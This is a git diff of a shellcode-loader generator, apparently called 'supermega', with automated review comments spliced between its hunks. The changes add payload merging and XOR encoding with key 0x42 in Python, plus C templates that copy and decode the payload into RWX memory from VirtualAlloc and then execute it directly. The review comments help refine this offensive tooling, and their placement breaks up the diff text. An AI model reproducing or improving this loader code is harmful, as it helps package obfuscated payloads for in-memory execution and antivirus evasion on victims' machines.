diff --git a/phases/asmtoshc.py b/phases/asmtoshc.py
index 0ccb815..78e5532 100644
--- a/phases/asmtoshc.py
+++ b/phases/asmtoshc.py
@@ -1,8 +1,11 @@
 import pefile
 import pprint
+from model import *
 from helper import *
 from config import config
+from observer import observer
+from project import project
 
 
 def make_shc_from_asm(asm_file, exe_file, shc_file):
@@ -27,3 +30,27 @@ def make_shc_from_asm(asm_file, exe_file, shc_file):
     return code
     #print("---[ Shellcode from {} written to: {} (size: {}) ]".format(exe_file, shc_file, len(code)))
 
+
+
+def merge_loader_payload(main_shc_file):
+    print("--[ Merge stager: {} + {} -> {} ] ".format(
+        main_shc_file, project.payload, main_shc_file))
+    with open(main_shc_file, 'rb') as input1:
+        data_stager = input1.read()
+    with open(project.payload, 'rb') as input2:
+        data_payload = input2.read()
+
+    if project.decoder_style == DecoderStyle.PLAIN_1:
+        pass
+    elif project.decoder_style == DecoderStyle.XOR_1:
+        xor_key = 0x42
+        print("---[ XOR payload with key 0x{:x}".format(xor_key))
+        data_payload = bytes([byte ^ xor_key for byte in data_payload])
+
+    print("---[ Size: Stager: {} and Payload: {} Sum: {} ]".format(
+        len(data_stager), len(data_payload), len(data_stager)+len(data_payload)))
+
+    with open(main_shc_file, 'wb') as output:
+        data = data_stager + data_payload
+        output.write(data)
+    observer.add_code("final_shellcode", data)
diff --git a/phases/ctoasm.py b/phases/ctoasm.py
index 2f2ba58..fa24515 100644
--- a/phases/ctoasm.py
+++ b/phases/ctoasm.py
@@ -4,12 +4,13 @@ import os
 import pprint
 from observer import observer
 from jinja2 import Template
-from project import project
+from project import project
 from model import *
 
 
 use_templates = True
 
+
 def create_c_from_template():
     plugin_allocator = ""
     plugin_decoder = ""
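Review bot: `merge_loader_payload` has no `else` after the `DecoderStyle.XOR_1` branch, so any other `project.decoder_style` value silently falls through and the payload is written unmodified; the same fall-through in `create_c_from_template` (phases/ctoasm.py, the `@@ -18,8 +19,12 @@` hunk) leaves `plugin_decoder` as `""`, so a misconfiguration produces inconsistent output in two places instead of failing. Add `else: raise ValueError("unsupported decoder_style: {}".format(project.decoder_style))` to both chains. The new function also has no docstring; one stating that it reads `main_shc_file` and `project.payload`, applies the transform selected by `project.decoder_style`, overwrites `main_shc_file` with the concatenation and records the result via `observer.add_code("final_shellcode", ...)` would cover the visible behavior. The literal `0x42` is hard-coded here and again in `plugins/decoder/xor_1.c` with nothing tying them together; at minimum a comment such as `# must match the key in plugins/decoder/xor_1.c` should mark the coupling.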
@@ -18,8 +19,12 @@ def create_c_from_template():
     with open("plugins/allocator/rwx_1.c", "r", encoding='utf-8') as file:
         plugin_allocator = file.read()
 
-    with open("plugins/decoder/plain_1.c", "r", encoding='utf-8') as file:
-        plugin_decoder = file.read()
+    if project.decoder_style == DecoderStyle.PLAIN_1:
+        with open("plugins/decoder/plain_1.c", "r", encoding='utf-8') as file:
+            plugin_decoder = file.read()
+    elif project.decoder_style == DecoderStyle.XOR_1:
+        with open("plugins/decoder/xor_1.c", "r", encoding='utf-8') as file:
+            plugin_decoder = file.read()
 
     with open("plugins/executor/direct_1.c", "r", encoding='utf-8') as file:
         plugin_executor = file.read()
@@ -115,8 +120,6 @@ def make_c_to_asm(c_file, asm_file, payload_len, capabilities: ExeCapabilities):
 
     shutil.move(asm_clean_file, asm_file)
     asm["cleanup"] = file_readall_text(asm_file)
-
-
     return asm
 
 
@@ -171,7 +174,7 @@ def fixup_asm_file(filename, payload_len, capabilities: ExeCapabilities):
     for idx, line in enumerate(lines):
         if "11223344" in lines[idx]:
             print(" > Replace payload length at line: {}".format(idx))
-            lines[idx] = lines[idx].replace("11223344", str(payload_len+1))
+            lines[idx] = lines[idx].replace("11223344", str(payload_len))
             break
 
     # add label at end of code
@@ -179,7 +182,6 @@ def fixup_asm_file(filename, payload_len, capabilities: ExeCapabilities):
         if lines[idx].startswith("END"):
             print(" > Add end of code label at line: {}".format(idx))
             lines.insert(idx-1, "shcstart:\r\n")
-            lines.insert(idx, "\tnop\r\n")
             break
 
     with open(filename, 'w') as asmfile:
diff --git a/plugins/allocator/rwx_1.c b/plugins/allocator/rwx_1.c
index 232f86a..fb6ffa8 100644
--- a/plugins/allocator/rwx_1.c
+++ b/plugins/allocator/rwx_1.c
@@ -1 +1 @@
-char *dest = VirtualAlloc(NULL, 4096, 0x3000, 0x40);
\ No newline at end of file
+ char *dest = VirtualAlloc(NULL, 4096, 0x3000, 0x40);
\ No newline at end of file
diff --git a/plugins/decoder/plain_1.c b/plugins/decoder/plain_1.c
index 348f92d..d78c95d 100644
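Review bot: The switch from `str(payload_len+1)` to `str(payload_len)` in the `@@ -171,7 +174,7 @@` hunk and the dropped `lines.insert(idx, "\tnop\r\n")` in the hunk after it look like one coupled change, but neither hunk records why, and `fixup_asm_file` extends beyond both. A comment above the replace line, e.g. `# 11223344 is the placeholder loop bound used by the decoder plugins; it is replaced with the exact appended payload length`, would capture the invariant this commit relies on (hedged: the bound's role is inferred from plugins/decoder/*.c in this diff). Separately, the loop binds `line` but tests `lines[idx]`; `if "11223344" in line:` is clearer and matches the `enumerate` it already uses.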
--- a/plugins/decoder/plain_1.c
+++ b/plugins/decoder/plain_1.c
@@ -1,3 +1,3 @@
-for(int n=0; n<11223344; n++) {
- dest[n] = supermega_payload[n];
-}
\ No newline at end of file
+ for (int n=0; n<11223344; n++) {
+ dest[n] = supermega_payload[n];
+ }
\ No newline at end of file
diff --git a/plugins/decoder/xor_1.c b/plugins/decoder/xor_1.c
index 03a317f..560ca6d 100644
--- a/plugins/decoder/xor_1.c
+++ b/plugins/decoder/xor_1.c
@@ -1,3 +1,4 @@
-for (i=0; i<11223344; i++){
- dest[i] = supermega_payload[i] ^ 0x42;
-}
\ No newline at end of file
+ for (int n=0; n<11223344; n++){
+ dest[n] = supermega_payload[n];
+ dest[n] = dest[n] ^ 0x42;
+ }
\ No newline at end of file
diff --git a/plugins/executor/direct_1.c b/plugins/executor/direct_1.c
index e1a284c..e0d986a 100644
--- a/plugins/executor/direct_1.c
+++ b/plugins/executor/direct_1.c
@@ -1 +1 @@
-(*(void(*)())(dest))();
\ No newline at end of file
+ (*(void(*)())(dest))();
\ No newline at end of file
diff --git a/supermega.py b/supermega.py
index c0e3d46..e73d1a9 100644
--- a/supermega.py
+++ b/supermega.py
@@ -135,19 +135,7 @@ def start():
 
     # Merge shellcode/loader with payload
     if project.dataref_style == DataRefStyle.APPEND:
-        print("--[ Merge stager: {} + {} -> {} ] ".format(
-            main_shc_file, project.payload, main_shc_file))
-        with open(main_shc_file, 'rb') as input1:
-            data_stager = input1.read()
-        with open(project.payload, 'rb') as input2:
-            data_payload = input2.read()
-        print("---[ Size: Stager: {} and Payload: {} Sum: {} ]".format(
-            len(data_stager), len(data_payload), len(data_stager)+len(data_payload)))
-
-        with open(main_shc_file, 'wb') as output:
-            data = data_stager + data_payload
-            output.write(data)
-        observer.add_code("final_shellcode", data)
+        merge_loader_payload(main_shc_file)
 
     if project.verify and project.source_style == SourceStyle.peb_walk:
         print("--[ Verify final shellcode ]")
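Review bot: `merge_loader_payload(main_shc_file)` is called in the supermega.py hunk, but this diff adds no import of that name to supermega.py; unless the file already pulls `phases.asmtoshc` in with a wildcard import (its import block is outside this hunk), the call raises `NameError` at runtime. Add `from phases.asmtoshc import merge_loader_payload` beside the existing imports, or confirm the wildcard covers it. Note also that the removed inline code assigned `data`, which the later `pickle.dump(data, file)` in the `@@ -180,9 +168,9 @@` hunk referenced; with that dump commented out the name is no longer needed here, but nothing else in `start()` visible in this diff defines it, so any remaining use of `data` outside the hunks would now fail. The enclosing `start()` continues outside the hunk.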
@@ -180,9 +168,9 @@ def start():
         ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
 
     # dump the info i gathered
-    file = open('latest.pickle', 'wb')
-    pickle.dump(data, file)
-    file.close()
+    #file = open('latest.pickle', 'wb')
+    #pickle.dump(data, file)
+    #file.close()
 
     # delete files
     if project.cleanup_files_on_exit:
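Review bot: The three `pickle` lines are commented out rather than removed, leaving dead code in `start()` together with the stale `# dump the info i gathered` comment above it, and — if nothing else in the file uses it — a now-unused `import pickle` (the import block is outside this hunk). Delete the four lines; version control keeps the history if the dump needs to come back. If it does return, prefer a `with open(...) as file:` block over the manual `open`/`close` pair so the handle is released on an exception, and consider a non-executable format such as JSON, since anything that later reloads `latest.pickle` would be deserializing arbitrary objects from disk.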